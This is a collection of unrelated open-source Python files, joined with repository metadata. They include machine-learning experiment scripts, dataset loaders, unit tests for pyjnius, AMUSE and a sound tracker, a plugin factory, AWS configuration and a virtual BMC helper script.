eprint, bold, green, fit_layerwise, remove_points, get_prediction_times,
run_exists)
import click
def run_single(prior_weight, device, M, fold, n_folds):
# Get dataset and model
test_size = 1 / n_folds
dataset = load_data("uci_kin8nm", seed=fold, device=device,
test_size=test_size)
model = get_model(dataset, n_inducing=M, n_layers=2, device=device,
add_input=True)
# Create callback for logging status to tracking server
def status_cb():
mlflow.set_tag("current_epoch", model.epoch.item())
model.register_callback(status_cb, update_interval=10)
# Pre-fit model, first one layer at a time, all layers the jointly
eprint(bold("\nLayerwise pre-fit"))
fit_layerwise(model, dataset, batch_size=4096, max_epochs=300)
eprint(bold("\nJoint pre-fit"))
model.fit(X=dataset.X_train, Y=dataset.Y_train, batch_size=4096,
max_epochs=500)
# Infer probabilities of inclusion for all pseudo-points and sample
# from resulting distribution to prune model
eprint(bold("\nPruning"))
for gp in model.gps:
gp.variational_point_process.probabilities = 0.8
model.fit_score_function_estimator(
X=dataset.X_train, Y=dataset.Y_train, learning_rate=0.3, max_epochs=10,
n_mcmc_samples=32)
for gp in model.gps:
remove_points(gp)
# Post-fit model, all layers jointly
eprint(bold("\nJoint post-fit"))
model.fit(X=dataset.X_train, Y=dataset.Y_train, batch_size=4096,
max_epochs=500)
# Log metrics
eprint(bold("\nEvaluating metrics"))
model.eval()
log_lik, KL = get_ELBO(model, dataset, batch_size=4096)
clock_time, wall_time = get_prediction_times(model, dataset)
train_log_lik, test_log_lik = get_loglik(
model, dataset, train=True, test=True, batch_size=4096)
mlflow.log_metrics({
"log_lik": log_lik,
"KL": KL,
"ELBO": train_log_lik - KL,
"clock_time": clock_time,
"wall_time": wall_time,
"train_log_lik": train_log_lik,
"test_log_lik": test_log_lik,
})
for layer, gp in enumerate(model.gps, 1):
mlflow.log_param(f"M{layer}", gp.n_inducing)
eprint()
@click.command()
@click.option("--device", type=click.Choice(["cpu", "cuda"]), default="cpu")
@click.option("--n-folds", default=5)
@click.option("--initial-inducing", "M", default=150)
@click.option("--prior-weight", type=float, default=1.0)
def run(M, device, prior_weight, n_folds):
# ID of currently running experiment
exp_id = get_experiment_id("dgp_kin8nm_adaptive_pruning")
for fold in range(1, n_folds + 1):
eprint(bold(f"Fold {fold}/{n_folds}"))
# Set parameters and tags defining this run
params = {
"M": M, "prior_weight": prior_weight, "fold": fold
}
if run_exists(params):
eprint(green("Already exists\n"))
continue
with mlflow.start_run(experiment_id=exp_id):
mlflow.log_params(params)
run_single(device=device, n_folds=n_folds, **params)
if __name__ == "__main__":
run()
| 3,309 |
example.py
|
tobyshooters/tensorcheck
| 10 |
2166345
|
import numpy as np
import torch
from tensorcheck import tensorcheck
@tensorcheck({
"img": {
"dtype": np.uint8,
"shape": [1, 3, "H", "W"],
"range": [0, 255]
},
"mask": {
"dtype": torch.float32,
"shape": [1, 1, "H", "W"],
"range": [0, 1]
},
"return": {
"dtype": np.float32,
"shape": [1, 3, "H", "W"],
"range": [0, 255]
},
})
def apply_mask(img, mask):
# ...do compute
return img * mask.numpy()
x = np.random.uniform(0, 255, size=[1, 3, 10, 8]).astype(np.uint8)
y = torch.rand(1, 1, 10, 7)
apply_mask(x, y)
# > tensorcheck.ShapeException: /mask/ dim 3 of torch.Size([1, 1, 10, 7]) is not W=8
x = np.random.uniform(0, 255, size=[1, 3, 10, 8]).astype(np.uint8)
y = 2 * torch.rand(1, 1, 10, 8)
apply_mask(x, y)
# > tensorcheck.UpperBoundException: /mask/ max value 1.9982... is greater than 1
x = np.random.uniform(0, 255, size=[1, 3, 10, 8]).astype(np.float)
y = torch.rand(1, 1, 10, 8)
apply_mask(x, y)
# > tensorcheck.DataTypeException: /img/ dtype float64 is not <class 'numpy.uint8'>
x = np.random.uniform(0, 255, size=[1, 3, 10, 8]).astype(np.uint8)
y = torch.rand(1, 1, 10, 8).int()
apply_mask(x, y)
# > tensorcheck.DataTypeException: /mask/ dtype torch.int32 is not torch.float32
x = np.random.uniform(0, 255, size=[1, 3, 10, 8]).astype(np.uint8)
y = torch.rand(1, 1, 10, 8)
apply_mask(x, y)
# > Success
| 1,418 |
kneedeepio/plugins/manager/pluginfactory.py
|
kneedeepio/python-plugin-framework
| 0 |
2170020
|
#!/usr/bin/env python3
### IMPORTS ###
import logging
import importlib
from kneedeepio.plugins.plugin import Plugin
from .exceptions import ServiceAlreadyRegisteredException
from .exceptions import ServiceNotRegisteredException
from .exceptions import PluginAlreadyLoadedException
from .exceptions import PluginNotLoadedException
### GLOBALS ###
### FUNCTIONS ###
### CLASSES ###
class PluginFactory:
def __init__(self, logging_srv):
self.logger = logging.getLogger(type(self).__name__)
self.logger.debug("Inputs - logging_srv: %s", logging_srv)
self._service_registry = {}
self._plugin_registry = []
self._load_callbacks = []
self._unload_callbacks = []
self.register_service("logging", logging_srv)
def register_service(self, service_type, service):
self.logger.debug("Inputs - service_type: %s, service: %s", service_type, service)
# Check if service type already registered.
if service_type in self._service_registry:
raise ServiceAlreadyRegisteredException("Service of type {} already registered.".format(service_type))
# Put service in registry
self._service_registry[service_type] = service
def load(self, module_name, class_name):
self.logger.debug("Inputs - module_name: %s, class_name: %s", module_name, class_name)
# Check if plugin is already loaded
for loaded_plugin in self._plugin_registry:
if loaded_plugin["module_name"] == module_name and loaded_plugin["class_name"] == class_name:
raise PluginAlreadyLoadedException
# Import the plugin
tmp_module = importlib.import_module(module_name)
self.logger.debug("tmp_module: %s", tmp_module)
# Create an instance of the plugin
tmp_class = getattr(tmp_module, class_name)
if not issubclass(tmp_class, Plugin):
raise TypeError("Plugin does not subclass kneedeepio.plugins.plugin.Plugin")
self.logger.debug("tmp_class: %s", tmp_class)
# NOTE: The logging service is always provided as it should always be used.
tmp_services = {"logging": self._service_registry["logging"]}
for tmp_service_type in tmp_class.required_services:
if tmp_service_type in self._service_registry:
tmp_services[tmp_service_type] = self._service_registry[tmp_service_type]
else:
raise ServiceNotRegisteredException("Service type '{}' not registered.".format(tmp_service_type))
tmp_instance = tmp_class(tmp_services)
self.logger.debug("tmp_instance: %s", tmp_instance)
# Store the instance in the registry list
self._plugin_registry.append({
"module_name": module_name,
"class_name": class_name,
"instance": tmp_instance
})
# Run the plugin instance setup
tmp_instance.setup()
# Call the load callbacks
for callback in self._load_callbacks:
callback(tmp_instance)
def unload(self, module_name, class_name):
self.logger.debug("Inputs - module_name: %s, class_name: %s", module_name, class_name)
# Check if plugin is already loaded
tmp_plugin = None
for loaded_plugin in self._plugin_registry:
if loaded_plugin["module_name"] == module_name and loaded_plugin["class_name"] == class_name:
tmp_plugin = loaded_plugin
if tmp_plugin is None:
raise PluginNotLoadedException
# Call the unload callbacks
for callback in self._unload_callbacks:
callback(tmp_plugin["instance"])
# Run the plugin instance teardown
tmp_plugin["instance"].teardown()
# Remove the instance from the registry
self._plugin_registry.remove(tmp_plugin)
# FIXME: How to un-import the plugin module?
# Is the un-import necessary?
# Have to check to make sure there aren't any other classes using
# the same module.
def register_load_callback(self, callback_method):
self.logger.debug("Inputs - callback_method: %s", callback_method)
# Add the callback method to the list of methods to call back on plugin load.
# The callback method should take one argument: the instance of the plugin.
self._load_callbacks.append(callback_method)
def register_unload_callback(self, callback_method):
self.logger.debug("Inputs - callback_method: %s", callback_method)
# Add the callback method to the list of methods to call back on plugin unload.
# The callback method should take one argument: the instance of the plugin.
self._unload_callbacks.append(callback_method)
def tick_plugins(self):
self.logger.debug("Inputs - None")
# Call the tick function for each of the plugins.
# This can be used as a heartbeat for the plugin, or used to perform a
# small amount of work.
for item in self._plugin_registry:
item["instance"].tick()
| 5,097 |
src/amuse/test/suite/ticket_tests/test_issue777.py
|
andrisdorozsmai/amuse
| 131 |
2169883
|
from amuse.test import amusetest
from amuse.units import units
from amuse.ic.brokenimf import new_kroupa_mass_distribution
class TestsForIssue777(amusetest.TestCase):
def test_upper_segment(self):
"Test if a star in the upper mass segment will get the right mass"
lower_limit = 1.0 | units.MSun
upper_limit = 1.0 | units.MSun
mass = new_kroupa_mass_distribution(
1,
mass_min=lower_limit,
mass_max=upper_limit,
)
self.assertEqual(mass[0], 1.0 | units.MSun)
def test_middle_segment(self):
"Test if a star in the middle mass segment will get the right mass"
lower_limit = 0.2 | units.MSun
upper_limit = 0.2 | units.MSun
mass = new_kroupa_mass_distribution(
1,
mass_min=lower_limit,
mass_max=upper_limit,
)
self.assertEqual(mass[0], 0.2 | units.MSun)
def test_lower_segment(self):
"Test if a star in the lower mass segment will get the right mass"
lower_limit = 0.02 | units.MSun
upper_limit = 0.02 | units.MSun
mass = new_kroupa_mass_distribution(
1,
mass_min=lower_limit,
mass_max=upper_limit,
)
self.assertEqual(mass[0], 0.02 | units.MSun)
| 1,308 |
podium/datasets/impl/cornell_movie_dialogs.py
|
TakeLab/podium
| 51 |
2170240
|
"""
Module contains Cornell Movie-Dialogs Corpus, available at
http://www.cs.cornell.edu/~cristian/Cornell_Movie-Dialogs_Corpus.html.
"""
import os
import re
from collections import namedtuple
from podium.datasets.dataset import Dataset
from podium.datasets.example_factory import ExampleFactory
from podium.field import Field
from podium.storage import LargeResource
from podium.vocab import Vocab
try:
import pandas as pd
except ImportError:
print(
"Problem occured while trying to import pandas. If the library is not "
"installed visit https://pandas.pydata.org/ for more details."
)
raise
CornellMovieDialogsNamedTuple = namedtuple(
"CornellMovieDialogsNamedTuple",
["titles", "conversations", "lines", "characters", "url"],
)
class CornellMovieDialogs(Dataset):
"""
Cornell Movie Dialogs dataset which contains sentences and replies from
movies.
"""
def __init__(self, data, fields=None):
"""
Dataset constructor.
Parameters
----------
data : CornellMovieDialogsNamedTuple
cornell movie dialogs data
fields : dict(str : Field)
dictionary that maps field name to the field
Raises
------
ValueError
If given data is None.
"""
if data is None:
raise ValueError(
"Specified data is None, dataset expects "
"CornellMovieDialogsNamedTuple instance."
)
if not fields:
fields = CornellMovieDialogs.get_default_fields()
examples = CornellMovieDialogs._create_examples(data=data, fields=fields)
super(CornellMovieDialogs, self).__init__(
**{"examples": examples, "fields": fields}
)
@staticmethod
def _create_examples(data: CornellMovieDialogsNamedTuple, fields):
"""
Method creates examples for Cornell Movie Dialogs dataset.
Examples are created from the lines and conversations in data.
Parameters
----------
data : CornellMovieDialogsNamedTuple
cornell movie dialogs data
fields : dict(str : Field)
dictionary mapping field names to fields
Returns
-------
list(Example)
list of created examples
"""
example_factory = ExampleFactory(fields)
examples = []
lines = data.lines
lines_dict = dict(zip(lines["lineID"], lines["text"]))
conversations_lines = data.conversations["utteranceIDs"]
for lines in conversations_lines:
# we skip monologues
if len(lines) < 2:
continue
for i in range(len(lines) - 1):
statement = lines_dict.get(lines[i])
reply = lines_dict.get(lines[i + 1])
# some lines in the dataset are empty
if not statement or not reply:
continue
examples.append(
example_factory.from_dict({"statement": statement, "reply": reply})
)
return examples
@staticmethod
def get_default_fields():
"""
Method returns default Cornell Movie Dialogs fields: sentence and reply.
Fields share same vocabulary.
Returns
-------
fields : dict(str, Field)
Dictionary mapping field name to field.
"""
vocabulary = Vocab()
statement = Field(
name="statement",
numericalizer=vocabulary,
tokenizer="split",
keep_raw=False,
is_target=False,
)
reply = Field(
name="reply",
numericalizer=vocabulary,
tokenizer="split",
keep_raw=False,
is_target=True,
)
fields = {"statement": statement, "reply": reply}
return fields
class CornellMovieDialogsLoader:
"""
Class for downloading and parsing the Cornell Movie-Dialogs dataset.
This class is used for downloading the dataset (if it's not already
downloaded) and parsing the files in the dataset. If it's not already
present LargeResource.BASE_RESOURCE_DIR, the dataset is automatically
downloaded when an instance of the loader is created. The downloaded
resources can be parsed using the load_dataset method.
"""
URL = "http://www.cs.cornell.edu/~cristian/data/cornell_movie_dialogs_corpus.zip"
ARCHIVE_TYPE = "zip"
NAME = "cornell_movie_dialogs_corpus"
DATA_FOLDER_NAME = "cornell movie-dialogs corpus"
DELIMITER = " +++$+++ "
ENCODING = "iso-8859-1"
TITLE_FIELDS = ["movieID", "title", "year", "rating", "votes", "genres"]
TITLE_FILENAME = "movie_titles_metadata.txt"
CHARACTERS_FIELDS = [
"characterID",
"character",
"movieID",
"title",
"gender",
"position",
]
CHARACTERS_FILENAME = "movie_characters_metadata.txt"
LINES_FIELDS = ["lineID", "characterID", "movieID", "character", "text"]
LINES_FILENAME = "movie_lines.txt"
CONVERSATIONS_FIELDS = ["character1ID", "character2ID", "movieID", "utteranceIDs"]
CONVERSATIONS_FILENAME = "movie_conversations.txt"
URL_FIELDS = ["movieID", "title", "url"]
URL_FILENAME = "raw_script_urls.txt"
def __init__(self):
"""
The constructor will check if the dataset is already been downloaded in
the LargeResource.BASE_RESOURCE_DIR.
If the dataset is not present, it will atempt to download it.
"""
LargeResource(
**{
LargeResource.RESOURCE_NAME: CornellMovieDialogsLoader.NAME,
LargeResource.ARCHIVE: CornellMovieDialogsLoader.ARCHIVE_TYPE,
LargeResource.URI: CornellMovieDialogsLoader.URL,
}
)
def load_dataset(self):
"""
Loads and parses all the necessary files from the dataset folder.
Returns
-------
data : CornellMovieDialogsNamedTuple
tuple that contains dictionaries for 5 types of Cornell movie dialogs data:
titles, conversations, lines, characters and script urls.
Fields for every type are defined in class constants.
"""
titles = self.load_titles()
conversations = self.load_conversations()
lines = self.load_lines()
characters = self.load_characters()
url = self.load_urls()
return CornellMovieDialogsNamedTuple(
titles=titles,
conversations=conversations,
lines=lines,
characters=characters,
url=url,
)
@staticmethod
def _load_file(file_name, fields, columns_hooks=None):
"""
Method loads file from Cornell movie dialogs dataset defined with file
name and fields that are used in the file.
Parameters
----------
file_name : str
string containing file path
fields : list(str)
list containing field names
columns_hooks : dict(str, callable)
functions that will be called on columns
variable represents dictionary that maps column name to a function
"""
data_frame = pd.read_csv(
filepath_or_buffer=os.path.join(
LargeResource.BASE_RESOURCE_DIR,
CornellMovieDialogsLoader.NAME,
CornellMovieDialogsLoader.DATA_FOLDER_NAME,
file_name,
),
sep=re.escape(CornellMovieDialogsLoader.DELIMITER),
encoding=CornellMovieDialogsLoader.ENCODING,
header=None,
names=fields,
engine="python",
)
if columns_hooks is not None:
for column_name in columns_hooks:
data_frame[column_name] = data_frame[column_name].apply(
columns_hooks[column_name]
)
return data_frame.to_dict(orient="list")
def load_titles(self):
"""
Method loads file containing movie titles.
"""
column_hooks = {}
column_hooks["genres"] = lambda s: s.strip("[]''").split("', '")
return self._load_file(
file_name=CornellMovieDialogsLoader.TITLE_FILENAME,
fields=CornellMovieDialogsLoader.TITLE_FIELDS,
columns_hooks=column_hooks,
)
def load_conversations(self):
"""
Method loads file containing movie conversations.
"""
column_hooks = {}
column_hooks["utteranceIDs"] = lambda s: s.strip("[]''").split("', '")
return self._load_file(
file_name=CornellMovieDialogsLoader.CONVERSATIONS_FILENAME,
fields=CornellMovieDialogsLoader.CONVERSATIONS_FIELDS,
columns_hooks=column_hooks,
)
def load_lines(self):
"""
Method loads file containing movie lines.
"""
return self._load_file(
file_name=CornellMovieDialogsLoader.LINES_FILENAME,
fields=CornellMovieDialogsLoader.LINES_FIELDS,
)
def load_characters(self):
"""
Method loads file containing movie characters.
"""
return self._load_file(
file_name=CornellMovieDialogsLoader.CHARACTERS_FILENAME,
fields=CornellMovieDialogsLoader.CHARACTERS_FIELDS,
)
def load_urls(self):
"""
Method loads file containing movie script urls.
"""
return self._load_file(
file_name=CornellMovieDialogsLoader.URL_FILENAME,
fields=CornellMovieDialogsLoader.URL_FIELDS,
)
| 9,730 |
cloud-warden/config.py
|
mijho/cloud-warden
| 0 |
2170069
|
"""Configuration - Static vars"""
import boto3
import os
ASG_CONFIG = boto3.client('autoscaling', region_name='eu-west-1')
EC2_CONFIG = boto3.client('ec2', region_name='eu-west-1')
WEBHOOK_URL = os.environ.get('WEBHOOK_URL')
SAWMILL_DEVELOPER_LOGS = os.environ.get('SAWMILL_DEVELOPER_LOGS')
SAWMILL_PB_MODE = os.environ.get('SAWMILL_PB_MODE')
AWS_REGIONS = [
'us-east-2', 'us-east-1', 'us-west-1', 'us-west-2', 'ap-east-1', 'ap-south-1', 'ap-northeast-1',
'ap-northeast-2', 'ap-northeast-3', 'ap-southeast-1', 'ap-southeast-2', 'ca-central-1', 'cn-north-1',
'cn-northwest-1', 'eu-central-1', 'eu-west-1', 'eu-west-2', 'eu-west-3', 'eu-north01', 'me-south-1',
'sa-east-1', 'us-gov-east-1', 'us-gov-west-1'
]
WARDEN_SCHEDULES = ['OfficeHours', 'ExtendedHours', 'DailyOnDemand', 'WeeklyOnDemand', 'terraform']
OFF_STATE = ['shutting-down', 'terminated', 'stopping', 'stopped']
ON_STATE = ['pending', 'running']
| 926 |
FinalYearProject/ConvolutionalNeuralNetwork/Train.py
|
nakster/FinalYearProject
| 1 |
2168317
|
# import tensorflow as tf
# import keras
# from keras.callbacks import TensorBoard
# import numpy as np
# import pandas as pd
# import matplotlib.pyplot as plt
# from sklearn.model_selection import train_test_split
from keras.models import Sequential
from keras.layers import Dense
from keras.layers import Dropout
from keras.layers import Flatten
from keras.layers.convolutional import Conv2D
from keras.layers.convolutional import MaxPooling2D
from keras.optimizers import Adam
from keras.utils import np_utils
from keras.datasets import fashion_mnist
def Train():
# Load the fashion-mnist pre-shuffled train data and test data
(x_train, y_train), (x_test, y_test) = fashion_mnist.load_data()
print("x_train shape:", x_train.shape, "y_train shape:", y_train.shape)
# Show one of the images from the training dataset
# img_index = 3
# plt.imshow(x_train[img_index])
# plt.show()
# Reshaping to format which CNN expects (batch, height, width, channels)
x_train = x_train.reshape(x_train.shape[0], x_train.shape[1], x_train.shape[2], 1).astype('float32')
x_test = x_test.reshape(x_test.shape[0], x_test.shape[1], x_test.shape[2], 1).astype('float32')
#Data normalization
#We then normalize the data dimensions so that they are of approximately the same scale.
# normalize inputs from 0-255 to 0-1
x_train/=255
x_test/=255
# convert class vectors to binary class matrices
#number of classes
classes = 10
# one-hot encoding
# we are expecting output as 8 means value of output variable 8
# so according to one-hot coding its [0,0,0,0,0,0,0,0,1,0]
y_train = np_utils.to_categorical(y_train, classes)
y_test = np_utils.to_categorical(y_test, classes)
#Define the model
model = Sequential()
# Must define the input shape in the first layer of the neural network
model.add(Conv2D(filters=64, kernel_size=2, padding='same', activation='relu', input_shape=(28,28,1)))
model.add(MaxPooling2D(pool_size=2))
model.add(Dropout(0.3))
model.add(Conv2D(filters=32, kernel_size=2, padding='same', activation='relu'))
model.add(MaxPooling2D(pool_size=2))
model.add(Dropout(0.3))
model.add(Flatten())
model.add(Dense(256, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(classes, activation='softmax'))
# Take a look at the model summary
model.summary()
#Compile the model
model.compile(loss='categorical_crossentropy',optimizer='adam',metrics=['accuracy'])
#Fit the model
model.fit(x_train,y_train, batch_size=64, epochs=10,validation_data=(x_test, y_test))
# Save the model to use test the pictures for later
model.save('Resources/CNNModel/fashionModel.h5')
# Evaluate the model on test set
score = model.evaluate(x_test, y_test, verbose=0)
# Print test accuracy
print("Metrics(Test lo ss & Test Accuracy): ")
print('Test loss:', score[0])
print('Test accuracy:', score[1])
| 2,989 |
southpark-search/pods/text_loader.py
|
YueLiu-jina/examples
| 0 |
2168977
|
__copyright__ = "Copyright (c) 2020 Jina AI Limited. All rights reserved."
__license__ = "Apache-2.0"
from typing import Dict
from jina.executors.crafters import BaseDocCrafter
class TextExtractor(BaseDocCrafter):
def craft(self, text: str, *args, **kwargs) -> Dict:
*_, s = text.split('[SEP]')
return dict(weight=1., text=s, meta_info=text.encode('utf8'))
| 381 |
setup.py
|
seiren87/yangsgoogle
| 0 |
2170050
|
from setuptools import setup, find_packages
setup(
name='yangsgoogle',
version='0.0.2',
description='Google API Wrapper',
long_description='Google API Wrapper',
keywords=['util', 'google'],
license='MIT',
python_requires='>=3.5',
author='seiren87',
author_email='<EMAIL>',
url='https://github.com/seiren87/yangsgoogle',
install_requires=[
'google-api-python-client==1.6.7',
'yangsutil==0.1.0'
],
packages=find_packages(
exclude=['test*']
),
zip_safe=False,
entry_points={
'console_scripts': [
'yangsgoogle=yangsgoogle.generator:main',
],
},
classifiers=[
'Intended Audience :: Developers',
'Topic :: Software Development :: Libraries',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
],
)
| 934 |
tests/test_basics.py
|
jmuhlich/pyjnius_indra
| 0 |
2169763
|
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
import unittest
from jnius.reflect import autoclass
class BasicsTest(unittest.TestCase):
def test_static_methods(self):
Test = autoclass('org.jnius.BasicsTest')
self.assertEquals(Test.methodStaticZ(), True)
self.assertEquals(Test.methodStaticB(), 127)
self.assertEquals(Test.methodStaticC(), 'k')
self.assertEquals(Test.methodStaticS(), 32767)
self.assertEquals(Test.methodStaticI(), 2147483467)
self.assertEquals(Test.methodStaticJ(), 2147483467)
self.assertAlmostEquals(Test.methodStaticF(), 1.23456789)
self.assertEquals(Test.methodStaticD(), 1.23456789)
self.assertEquals(Test.methodStaticString(), 'helloworld')
def test_static_fields(self):
Test = autoclass('org.jnius.BasicsTest')
self.assertEquals(Test.fieldStaticZ, True)
self.assertEquals(Test.fieldStaticB, 127)
self.assertEquals(Test.fieldStaticC, 'k')
self.assertEquals(Test.fieldStaticS, 32767)
self.assertEquals(Test.fieldStaticI, 2147483467)
self.assertEquals(Test.fieldStaticJ, 2147483467)
self.assertAlmostEquals(Test.fieldStaticF, 1.23456789)
self.assertEquals(Test.fieldStaticD, 1.23456789)
self.assertEquals(Test.fieldStaticString, 'helloworld')
def test_instance_methods(self):
test = autoclass('org.jnius.BasicsTest')()
self.assertEquals(test.methodZ(), True)
self.assertEquals(test.methodB(), 127)
self.assertEquals(test.methodC(), 'k')
self.assertEquals(test.methodS(), 32767)
self.assertEquals(test.methodI(), 2147483467)
self.assertEquals(test.methodJ(), 2147483467)
self.assertAlmostEquals(test.methodF(), 1.23456789)
self.assertEquals(test.methodD(), 1.23456789)
self.assertEquals(test.methodString(), 'helloworld')
def test_instance_fields(self):
test = autoclass('org.jnius.BasicsTest')()
self.assertEquals(test.fieldZ, True)
self.assertEquals(test.fieldB, 127)
self.assertEquals(test.fieldC, 'k')
self.assertEquals(test.fieldS, 32767)
self.assertEquals(test.fieldI, 2147483467)
self.assertEquals(test.fieldJ, 2147483467)
self.assertAlmostEquals(test.fieldF, 1.23456789)
self.assertEquals(test.fieldD, 1.23456789)
self.assertEquals(test.fieldString, 'helloworld')
test2 = autoclass('org.jnius.BasicsTest')(10)
self.assertEquals(test2.fieldB, 10)
self.assertEquals(test.fieldB, 127)
self.assertEquals(test2.fieldB, 10)
def test_instance_set_fields(self):
test = autoclass('org.jnius.BasicsTest')()
test.fieldSetZ = True
test.fieldSetB = 127
test.fieldSetC = ord('k')
test.fieldSetS = 32767
test.fieldSetI = 2147483467
test.fieldSetJ = 2147483467
test.fieldSetF = 1.23456789
test.fieldSetD = 1.23456789
self.assertTrue(test.testFieldSetZ())
self.assertTrue(test.testFieldSetB())
self.assertTrue(test.testFieldSetC())
self.assertTrue(test.testFieldSetS())
self.assertTrue(test.testFieldSetI())
self.assertTrue(test.testFieldSetJ())
self.assertTrue(test.testFieldSetF())
self.assertTrue(test.testFieldSetD())
def test_instances_methods_array(self):
test = autoclass('org.jnius.BasicsTest')()
self.assertEquals(test.methodArrayZ(), [True] * 3)
self.assertEquals(test.methodArrayB()[0], 127)
self.assertEquals(test.methodArrayB(), [127] * 3)
self.assertEquals(test.methodArrayC(), ['k'] * 3)
self.assertEquals(test.methodArrayS(), [32767] * 3)
self.assertEquals(test.methodArrayI(), [2147483467] * 3)
self.assertEquals(test.methodArrayJ(), [2147483467] * 3)
ret = test.methodArrayF()
ref = [1.23456789] * 3
self.assertAlmostEquals(ret[0], ref[0])
self.assertAlmostEquals(ret[1], ref[1])
self.assertAlmostEquals(ret[2], ref[2])
self.assertEquals(test.methodArrayD(), [1.23456789] * 3)
self.assertEquals(test.methodArrayString(), ['helloworld'] * 3)
def test_instances_methods_params(self):
test = autoclass('org.jnius.BasicsTest')()
self.assertEquals(test.methodParamsZBCSIJFD(
True, 127, 'k', 32767, 2147483467, 2147483467, 1.23456789, 1.23456789), True)
self.assertEquals(test.methodParamsString('helloworld'), True)
self.assertEquals(test.methodParamsArrayI([1, 2, 3]), True)
self.assertEquals(test.methodParamsArrayString([
'hello', 'world']), True)
def test_instances_methods_params_object_list_str(self):
test = autoclass('org.jnius.BasicsTest')()
self.assertEquals(test.methodParamsObject([
'hello', 'world']), True)
def test_instances_methods_params_object_list_int(self):
test = autoclass('org.jnius.BasicsTest')()
self.assertEquals(test.methodParamsObject([1, 2]), True)
def test_instances_methods_params_object_list_float(self):
test = autoclass('org.jnius.BasicsTest')()
self.assertEquals(test.methodParamsObject([3.14, 1.61]), True)
def test_instances_methods_params_object_list_long(self):
test = autoclass('org.jnius.BasicsTest')()
self.assertEquals(test.methodParamsObject([1, 2]), True)
def test_instances_methods_params_array_byte(self):
test = autoclass('org.jnius.BasicsTest')()
self.assertEquals(test.methodParamsArrayByte([127, 127, 127]), True)
ret = test.methodArrayB()
self.assertEquals(test.methodParamsArrayByte(ret), True)
def test_return_array_as_object_array_of_strings(self):
test = autoclass('org.jnius.BasicsTest')()
self.assertEquals(test.methodReturnStrings(), ['Hello', 'world'])
def test_return_array_as_object_of_integers(self):
test = autoclass('org.jnius.BasicsTest')()
self.assertEquals(test.methodReturnIntegers(), [1, 2])
| 6,134 |
tests/test_sound/test_sound_tracker.py
|
janbrrr/dndj
| 8 |
2169878
|
import asyncio
import pytest
from src.sound.sound_tracker import SoundTracker
class TestSoundTracker:
def test_get_sound_key(self):
tracker = SoundTracker()
assert tracker._get_sound_key(0, 0) == "0-0"
assert tracker._get_sound_key(1, 0) == "1-0"
assert tracker._get_sound_key(0, 1) == "0-1"
async def test_register_sound(self, loop):
tracker = SoundTracker()
task = loop.create_task(asyncio.sleep(0.001))
tracker.register_sound(0, 1, task)
assert tracker.sound_to_task[tracker._get_sound_key(0, 1)] == task
async def test_register_sound_raises_if_task_done(self, loop):
tracker = SoundTracker()
task = loop.create_task(asyncio.sleep(0.001))
await task
with pytest.raises(RuntimeError):
tracker.register_sound(0, 0, task)
async def test_automatically_unregisters_sound_if_done(self, loop):
tracker = SoundTracker()
task = loop.create_task(asyncio.sleep(0.001))
tracker.register_sound(0, 1, task)
key = tracker._get_sound_key(0, 1)
assert tracker.sound_to_task[tracker._get_sound_key(0, 1)] == task
await task
assert key not in tracker.sound_to_task
async def test_unregister_sound_raises_if_task_not_done(self, loop):
tracker = SoundTracker()
task = loop.create_task(asyncio.sleep(0.001))
tracker.register_sound(0, 1, task)
with pytest.raises(RuntimeError):
tracker._unregister_sound(0, 1, None)
async def test_cancel_sound_cancels_task(self, loop):
tracker = SoundTracker()
task = loop.create_task(asyncio.sleep(0.001))
key = tracker._get_sound_key(0, 1)
tracker.register_sound(0, 1, task)
assert key in tracker.sound_to_task
await tracker.cancel_sound(0, 1)
assert task.cancelled()
assert key not in tracker.sound_to_task
async def test_active_sounds(self, loop):
tracker = SoundTracker()
assert len(tracker.active_sounds) == 0
task = loop.create_task(asyncio.sleep(0.001))
tracker.register_sound(0, 1, task)
assert len(tracker.active_sounds) == 1
assert tracker.active_sounds[0]
| 2,240 |
room_occupancy_model/classification_model.py
|
sharabhshukla/room_occupancy_prediction
| 0 |
2169902
|
import joblib
import os
import dotenv
import sys
from room_occupancy_model.preprocessors import classifier_pipeline
from room_occupancy_model.preprocessors import pipe_preprocessors as pp
dotenv.load_dotenv()
class prediction_model():
def __init__(self):
home_dir = os.environ.get("pkg_root_dir")
model_path = os.path.join(home_dir, 'room_occupancy_model/models/prediction_pipeline.sav')
self._model = joblib.load(model_path)
def predict(self, X):
return self._model.predict(X)
| 526 |
hack/deploy-hub-local/helpers/vbmc.py
|
borball/ztp-pipeline-relocatable
| 0 |
2169724
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import yaml
installfile = "/root/install-config.yaml"
with open(installfile) as f:
data = yaml.safe_load(f)
uri = data["platform"]["baremetal"]["libvirtURI"]
hosts = data["platform"]["baremetal"]["hosts"]
for host in hosts:
name = host["name"]
address = host["bmc"]["address"].replace("ipmi://", "")
if not address.startswith("DONTCHANGEME"):
continue
if ":" in address:
address, port = address.split(":")
port = "--port %s" % port
else:
port = ""
username = host["bmc"]["username"]
password = host["bmc"]["password"]
cmd = (
"vbmc add %s %s --username %s --password %s --libvirt-uri %s; vbmc start %s"
% (name, port, username, password, uri, name)
)
os.system(cmd)
| 892 |
jarbas/core/urls.py
|
cclauss/serenata-de-amor
| 0 |
2169387
|
from django.conf.urls import url
from jarbas.core.views import CompanyDetailView
urlpatterns = [
url(
r'^company/(?P<cnpj>\d{14})/$',
CompanyDetailView.as_view(),
name='company-detail'
),
]
| 225 |
training/barcodes/scripts/prepare_training_data.py
|
acuacal/poreplex
| 76 |
2170186
|
#!/usr/bin/env python3
#
# Copyright (c) 2018 Institute for Basic Science
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
